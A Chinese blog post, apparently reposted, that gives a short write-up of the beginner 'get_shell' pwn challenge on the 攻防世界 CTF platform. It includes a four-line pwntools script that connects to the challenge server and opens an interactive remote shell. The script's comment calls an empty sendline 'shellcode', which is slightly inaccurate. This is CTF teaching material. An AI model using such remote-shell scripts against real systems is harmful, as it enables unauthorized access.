码迷,mamicode.com
首页 > 系统相关 > 详细

PWN-攻防世界 get_shell

时间:2020-07-11 09:40:28      阅读:72      评论:0      收藏:0      [点我收藏+]

标签:lock   链接服务器   image   远程连接   inf   task   导入   remote   clear   

get_shell

难度系数: 6.0
题目描述:运行就能拿到shell呢,真的
题目场景:
220.249.52.133:57808
题目附件: 

链接:https://pan.baidu.com/s/13OAHCWRew06-jZINlvVUtA
提取码:eodj

直接拖进IDA64(如果是32位的文件IDA会报错的)

技术图片

 

 F5反汇编一下

技术图片

 

 够直接....

再一结合他的题目描述,可以的,没骗人

开始写EXP啦

from pwn import *   #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","57808")  # 链接服务器远程交互
r.sendline()  # 将shellcode 发送到远程连接
r.interactive()  # 将控制权交给用户,这样就可以使用打开的shell了

运行,结束

技术图片

 

 flag乖乖出来啦~

 flag就不打码了,没有什么必要

PWN-攻防世界 get_shell

标签:lock   链接服务器   image   远程连接   inf   task   导入   remote   clear   

原文地址:https://www.cnblogs.com/XXX-Echoed/p/13282187.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!